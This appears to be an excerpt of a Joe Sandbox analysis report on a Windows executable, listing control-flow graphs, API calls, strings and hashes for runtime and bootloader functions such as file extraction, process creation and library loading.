                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction ID: a4914d0f7dfa9b9710d8b369e1f4e1515fb203e412ab33096a17686aa72cbc8c
                                                                                                                      • Opcode Fuzzy Hash: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction Fuzzy Hash: 69A14637A101189FCF19DF68DC51BEE3BA1AB06324F28015DE812EF292DB358D16EB51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 327 f6d692-f6d6c4 call f6d261 call f6d267 call f6d2c5 334 f6d6ca-f6d6d6 call f6d26d 327->334 335 f6d928-f6d963 call f63b43 call f6d261 call f6d267 call f6d2c5 327->335 334->335 340 f6d6dc-f6d6e6 334->340 366 f6da82-f6dade call f63b43 call f69476 335->366 367 f6d969-f6d975 call f6d26d 335->367 343 f6d71d-f6d71f 340->343 344 f6d6e8 340->344 345 f6d722-f6d72b 343->345 347 f6d6ea-f6d6f0 344->347 345->345 350 f6d72d-f6d743 call f65ba2 345->350 348 f6d6f2-f6d6f5 347->348 349 f6d710-f6d712 347->349 352 f6d6f7-f6d6ff 348->352 353 f6d70c-f6d70e 348->353 354 f6d715-f6d717 349->354 361 f6d91a-f6d920 call f63b77 350->361 362 f6d749-f6d764 call f63b77 350->362 352->349 357 f6d701-f6d70a 352->357 353->354 354->343 358 f6d921-f6d925 354->358 357->347 357->353 361->358 374 f6d767-f6d771 362->374 387 f6dae0-f6dae6 366->387 388 f6dae8-f6daeb 366->388 367->366 375 f6d97b-f6d987 call f6d299 367->375 374->374 377 f6d773-f6d787 call f68911 374->377 375->366 386 f6d98d-f6d9ae call f63b77 GetTimeZoneInformation 375->386 384 f6d926 377->384 385 f6d78d-f6d7df call f5a8f0 * 4 call f6d64b 377->385 384->335 447 f6d7e0-f6d7e3 385->447 400 f6d9b4-f6d9d4 386->400 401 f6da5f-f6da81 call f6d25b call f6d24f call f6d255 386->401 393 f6db35-f6db47 387->393 391 f6daf1-f6db04 call f65ba2 388->391 392 f6daed-f6daef 388->392 409 f6db06 391->409 410 f6db10-f6db29 call f69476 391->410 392->393 397 f6db57 call f6d933 393->397 398 f6db49-f6db4c 393->398 405 f6db5c-f6db71 call f63b77 call f596fa 397->405 398->397 403 f6db4e-f6db55 call f6d692 398->403 407 f6d9d6-f6d9db 400->407 408 f6d9de-f6d9e6 400->408 403->405 407->408 415 f6d9f8-f6d9fa 408->415 416 f6d9e8-f6d9ef 408->416 417 f6db07-f6db0e call f63b77 409->417 428 f6db2e-f6db2f call f63b77 410->428 429 f6db2b-f6db2c 410->429 423 f6d9fc-f6da5c call f5a8f0 * 4 call f6a531 call f6db72 * 2 415->423 416->415 425 f6d9f1-f6d9f6 416->425 440 f6db34 417->440 423->401 425->423 428->440 429->417 440->393 449 f6d7e5 447->449 450 f6d7e8-f6d7eb 447->450 449->450 450->447 452 f6d7ed-f6d7fb 450->452 453 f6d800-f6d815 call f65c35 452->453 454 f6d7fd 452->454 460 f6d818-f6d81e 453->460 454->453 462 f6d820-f6d827 460->462 463 f6d829-f6d82c 460->463 462->463 465 f6d82e-f6d834 462->465 463->460 467 f6d8ce-f6d8d5 465->467 468 f6d83a-f6d865 call f65c35 465->468 470 f6d8d7-f6d8d9 467->470 471 f6d8dc-f6d8ed 467->471 477 f6d887-f6d88d 468->477 478 f6d867-f6d86b 468->478 470->471 473 f6d8ef-f6d906 call f6d64b 471->473 474 f6d909-f6d918 call f6d25b call f6d24f 471->474 473->474 474->361 477->467 483 f6d88f-f6d8b2 call f65c35 477->483 481 f6d86c-f6d872 478->481 484 f6d884 481->484 485 f6d874-f6d882 481->485 483->467 490 f6d8b4-f6d8b8 483->490 484->477 485->481 485->484 491 f6d8b9-f6d8bc 490->491 492 f6d8be-f6d8c9 491->492 493 f6d8cb 491->493 492->491 492->493 493->467
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F6D74F
                                                                                                                      • _free.LIBCMT ref: 00F6D91B
                                                                                                                      • _free.LIBCMT ref: 00F6D993
                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                      • API String ID: 597776487-239921721
                                                                                                                      • Opcode ID: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
                                                                                                                      • Instruction ID: d825624d30430361a82a9d734e65692aca9072600b93619af88ae2d7305dddf3
                                                                                                                      • Opcode Fuzzy Hash: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
                                                                                                                      • Instruction Fuzzy Hash: 26A12472F00219AFDB10AFB4DC42ABE7BB8EF44720F144169E904A7191EB349E45FB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 494 f51040-f51073 call f58590 497 f51075-f51093 call f52340 494->497 498 f51094-f510a7 call f5e380 494->498 503 f510a9-f510c3 call f521e0 498->503 504 f510c8-f510d9 call f5e380 498->504 511 f511f0-f51213 call f583d0 call f5e365 * 2 503->511 509 f510db-f510f5 call f521e0 504->509 510 f510fa-f51117 504->510 509->511 514 f51129 510->514 515 f51119 510->515 520 f5112b-f51142 call f5b91e 514->520 518 f51122-f51127 515->518 519 f5111b-f51120 515->519 518->520 519->514 519->518 526 f51148-f51158 call f5b70c 520->526 527 f511eb 520->527 526->527 532 f5115e-f51197 call f56c00 526->532 528 f511ee-f511ef 527->528 528->511 535 f511a7-f511b9 call f5bf4f 532->535 536 f51199-f511a0 532->536 543 f511be-f511c3 535->543 536->535 537 f51250-f51255 536->537 538 f5125a-f5125d 536->538 541 f511d5-f511e8 call f52340 537->541 538->541 542 f51263-f51265 538->542 541->527 542->528 545 f511c5-f511d0 call f5b70c 543->545 546 f511d2 543->546 545->546 546->541
                                                                                                                      Strings
                                                                                                                      • malloc, xrefs: 00F510B6, 00F510E8
                                                                                                                      • Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00F5107E
                                                                                                                      • Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00F510B1
                                                                                                                      • Failed to extract %s: decompression resulted in return code %d!, xrefs: 00F511DE
                                                                                                                      • Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00F510E3
                                                                                                                      • 1.2.11, xrefs: 00F5104D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1.2.11$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                      • API String ID: 0-1060636955
                                                                                                                      • Opcode ID: 92f3772ba986257c0679539743479cca398b2f2067041c74c234505cf22c2d4e
                                                                                                                      • Instruction ID: 7f51e05d369b6216dd8425dd802cdf752b2134067000c3176bb48a8794fd94db
                                                                                                                      • Opcode Fuzzy Hash: 92f3772ba986257c0679539743479cca398b2f2067041c74c234505cf22c2d4e
                                                                                                                      • Instruction Fuzzy Hash: 1B51F771D043005BD3109F689C82B5BBBE8BF45762F04096DFF48D6282E765EA0CA793

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                        • Part of subcall function 00F60F12: SetConsoleCtrlHandler.KERNEL32(00F60B95,00000001,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F6102A
                                                                                                                        • Part of subcall function 00F60F12: GetLastError.KERNEL32 ref: 00F61044
                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 00F5616B
                                                                                                                      • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00F561FC
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00F5620B
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5621B
                                                                                                                      • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 00F56229
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                      • API String ID: 1248179626-3524285272
                                                                                                                      • Opcode ID: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
                                                                                                                      • Instruction ID: 07dea62a8891e7f97d8b8b6f8fcdbe468af907573e13a5ce9da34248cc774f38
                                                                                                                      • Opcode Fuzzy Hash: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
                                                                                                                      • Instruction Fuzzy Hash: DB319370A08344ABEB10EFA0CC4AB4B77E8AF44705F504919B694961C2DBFDD558EB53

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 589 f670e9-f670f5 590 f6719c-f6719f 589->590 591 f671a5 590->591 592 f670fa-f6710b 590->592 595 f671a7-f671ab 591->595 593 f6710d-f67110 592->593 594 f67118-f67131 LoadLibraryExW 592->594 596 f67116 593->596 597 f67199 593->597 598 f67183-f6718c 594->598 599 f67133-f6713c GetLastError 594->599 600 f67195-f67197 596->600 597->590 598->600 601 f6718e-f6718f FreeLibrary 598->601 602 f67173 599->602 603 f6713e-f67150 call f6394d 599->603 600->597 604 f671ac-f671ae 600->604 601->600 606 f67175-f67177 602->606 603->602 609 f67152-f67164 call f6394d 603->609 604->595 606->598 608 f67179-f67181 606->608 608->597 609->602 612 f67166-f67171 LoadLibraryExW 609->612 612->606
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                      • API String ID: 0-537541572
                                                                                                                      • Opcode ID: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
                                                                                                                      • Instruction ID: 378f146946c2a4c7c8d676ad1a4221bf3766984b1555ba7ffe014a561a214a2b
                                                                                                                      • Opcode Fuzzy Hash: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
                                                                                                                      • Instruction Fuzzy Hash: E1210A32E09325BBDB22AB349C44B5A77599F437BCF250523ED09A7292D630DE01F6E1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 767 f6565b-f65677 768 f6582e 767->768 769 f6567d-f6567f 767->769 770 f65830-f65834 768->770 771 f656a1-f656c2 769->771 772 f65681-f65694 call f5e606 call f5e619 call f63b33 769->772 773 f656c4-f656c7 771->773 774 f656c9-f656cf 771->774 790 f65699-f6569c 772->790 773->774 776 f656d4-f656d9 773->776 774->772 777 f656d1 774->777 779 f656ea-f656f3 call f65202 776->779 780 f656db-f656e7 call f64bdd 776->780 777->776 788 f656f5-f656f7 779->788 789 f6572e-f65740 779->789 780->779 793 f6571b-f65724 call f64dee 788->793 794 f656f9-f656fe 788->794 791 f65742-f65748 789->791 792 f65788-f657a9 WriteFile 789->792 790->770 798 f6574a-f6574d 791->798 799 f65778-f65786 call f65273 791->799 795 f657b4 792->795 796 f657ab-f657b1 GetLastError 792->796 804 f65729-f6572c 793->804 800 f65704-f65711 call f6519a 794->800 801 f657f8-f6580a 794->801 805 f657b7-f657c2 795->805 796->795 806 f6574f-f65752 798->806 807 f65768-f65776 call f65437 798->807 799->804 811 f65714-f65716 800->811 802 f65811-f65824 call f5e619 call f5e606 801->802 803 f6580c-f6580f 801->803 802->790 803->768 803->802 804->811 812 f657c4-f657c9 805->812 813 f65829-f6582c 805->813 806->801 814 f65758-f65766 call f6534e 806->814 807->804 811->805 819 f657f5 812->819 820 f657cb-f657d0 812->820 813->770 814->804 819->801 824 f657d2-f657e4 call f5e619 call f5e606 820->824 825 f657e9-f657f0 call f5e5e3 820->825 824->790 825->790
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F64DEE: GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
                                                                                                                      • WriteFile.KERNELBASE(?,?,?,00F7F0D8,00000000,00000000,00000000,00000000,?,00F7F0D8,00000010,00F5BEDB,00000000,00000000,00000000), ref: 00F657A1
                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00F657AB
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F657EA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910155933-0
                                                                                                                      • Opcode ID: 03ed0484e48cbcc678d9981a216c154793af50b87f5802fc9fdd5145aaa10335
                                                                                                                      • Instruction ID: bfd6f87ddc29423d1a46e34305079589e954682fe9c9ef9748d07abdeb478683
                                                                                                                      • Opcode Fuzzy Hash: 03ed0484e48cbcc678d9981a216c154793af50b87f5802fc9fdd5145aaa10335
                                                                                                                      • Instruction Fuzzy Hash: 2751D076D00A0AEBDF15DFA4CC05BEE7BB9AF55B24F180045E800BB152D635DA41FB61

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 834 f6da8d-f6dade call f69476 837 f6dae0-f6dae6 834->837 838 f6dae8-f6daeb 834->838 841 f6db35-f6db47 837->841 839 f6daf1-f6db04 call f65ba2 838->839 840 f6daed-f6daef 838->840 849 f6db06 839->849 850 f6db10-f6db29 call f69476 839->850 840->841 843 f6db57 call f6d933 841->843 844 f6db49-f6db4c 841->844 848 f6db5c-f6db71 call f63b77 call f596fa 843->848 844->843 846 f6db4e-f6db55 call f6d692 844->846 846->848 853 f6db07-f6db0e call f63b77 849->853 859 f6db2e-f6db2f call f63b77 850->859 860 f6db2b-f6db2c 850->860 865 f6db34 853->865 859->865 860->853 865->841
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F6DB5D
                                                                                                                        • Part of subcall function 00F6D933: _free.LIBCMT ref: 00F6D993
                                                                                                                        • Part of subcall function 00F6D933: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 597776487-0
                                                                                                                      • Opcode ID: 5bffe0377b4ab1e74b585ff2c536d2b0c79aa92047fce57eb19db8f887b452ea
                                                                                                                      • Instruction ID: 95a12717d86a764bc90b88dd0a09c79ca27be616c30bf853eacc21f9e10e9777
                                                                                                                      • Opcode Fuzzy Hash: 5bffe0377b4ab1e74b585ff2c536d2b0c79aa92047fce57eb19db8f887b452ea
                                                                                                                      • Instruction Fuzzy Hash: C1212673E00319A6CB20AB358C45EBA73BCDFC0324F224265E565A7192EF749E45B650

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 866 f63cca-f63cde call f60aa8 869 f63ce4-f63cec 866->869 870 f63ce0-f63ce2 866->870 872 f63cf7-f63cfa 869->872 873 f63cee-f63cf5 869->873 871 f63d32-f63d52 call f60a17 870->871 881 f63d54-f63d5e call f5e5e3 871->881 882 f63d60 871->882 876 f63cfc-f63d00 872->876 877 f63d18-f63d28 call f60aa8 CloseHandle 872->877 873->872 875 f63d02-f63d16 call f60aa8 * 2 873->875 875->870 875->877 876->875 876->877 877->870 885 f63d2a-f63d30 GetLastError 877->885 887 f63d62-f63d65 881->887 882->887 885->871
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D20
                                                                                                                      • GetLastError.KERNEL32(?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D2A
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F63D55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2583163307-0
                                                                                                                      • Opcode ID: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
                                                                                                                      • Instruction ID: 1675435a84074543a518818187f7684e68433e5bb0626e246cdd708320fd5a51
                                                                                                                      • Opcode Fuzzy Hash: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
                                                                                                                      • Instruction Fuzzy Hash: CD018E33F0026C1BC2205374DC06B7E77884F82774F38025DF818971C2DE698E817290

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 891 f64b46-f64b5e call f60aa8 894 f64b60-f64b65 call f5e619 891->894 895 f64b71-f64b87 SetFilePointerEx 891->895 901 f64b6b-f64b6f 894->901 896 f64b98-f64ba2 895->896 897 f64b89-f64b96 GetLastError call f5e5e3 895->897 900 f64ba4-f64bb9 896->900 896->901 897->901 904 f64bbe-f64bc1 900->904 901->904
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00F64BF3,00000000,00000000,00000002,00000000), ref: 00F64B7F
                                                                                                                      • GetLastError.KERNEL32(?,00F64BF3,00000000,00000000,00000002,00000000,?,00F656E7,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?), ref: 00F64B89
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F64B90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2336955059-0
                                                                                                                      • Opcode ID: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
                                                                                                                      • Instruction ID: ad79fd64dd8721ce693d9f515998a546d84c12524825a32f6cd3a6de087449d8
                                                                                                                      • Opcode Fuzzy Hash: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
                                                                                                                      • Instruction Fuzzy Hash: DA01D833610518BBCB059B99DC45DAE3B29DBC5330B340248F952971D1EA74EE41B750
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1545401867-0
                                                                                                                      • Opcode ID: b24f01813a618321da0e741e1eef1aefe3d8761d1631a537e620f0965bca4775
                                                                                                                      • Instruction ID: 18a8b2e30c9783e7a95101a8ebf6dcacd5fef14d15b700ce70444c4cd6b8b048
                                                                                                                      • Opcode Fuzzy Hash: b24f01813a618321da0e741e1eef1aefe3d8761d1631a537e620f0965bca4775
                                                                                                                      • Instruction Fuzzy Hash: 81D0123250825C7B8F102BF5BD098177B5D9B803797140665FA3CC54A0EE35CAD0B551
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryErrorLastRemove__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4061612599-0
                                                                                                                      • Opcode ID: 6c33a79fcf4f3ecaf10a6158a32c432eea0fa7ead880a7e4e351e019804ece17
                                                                                                                      • Instruction ID: bc3f5f78d97fb18341b9472c24dbc48779b83f0f0ebfcadf0163253676f1f3cc
